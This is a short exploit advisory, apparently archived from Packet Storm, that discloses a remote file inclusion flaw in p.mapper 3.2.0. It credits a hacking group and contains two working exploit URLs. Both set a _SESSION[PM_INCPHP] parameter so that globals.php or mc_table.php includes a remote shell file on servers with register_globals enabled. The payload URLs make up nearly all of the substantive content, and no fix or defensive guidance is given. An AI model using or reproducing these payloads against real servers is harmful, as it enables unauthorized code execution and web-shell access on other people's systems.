p.mapper version 3.2.0 suffers from a remote file inclusion vulnerability.
a74a7edf3ff0355f846c09e4ed08f06ea90e970c93c28091d947bb3e47b41811~~~~~~~~~~~~~~~~~~~~~~~~
~ p.mapper 3.2.0 RFI ~
~~~~~~~~~~~~~~~~~~~~~~~~
---------------------
Author : ShAy6oOoN
---------------------
Group : PitBull Crew
---------------------
Script : p.mapper 3.2.0
---------------------
Download : http://downloads.sourceforge.net/pmapper/pmapper-3.2-beta3.zip?modtime=1196115954&big_mirror=0
---------------------
Vulnerability Type : Remote File Inclusion
---------------------
Method : get
---------------------
Register_globals : On
---------------------
Exploit URL's :
---------------------
http://localhost/pmapper-3.2-beta3/incphp/globals.php?_SESSION[PM_INCPHP]=http://localhost/shell.txt?
http://localhost/pmapper-3.2-beta3/plugins/export/mc_table.php?_SESSION[PM_INCPHP]=http://localhost/shell.txt?
Greetings:
----------
PitBull Crew : The_PitBull - iNs - c0ol - Raz0r
Thanks To:
----------
str0ke
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed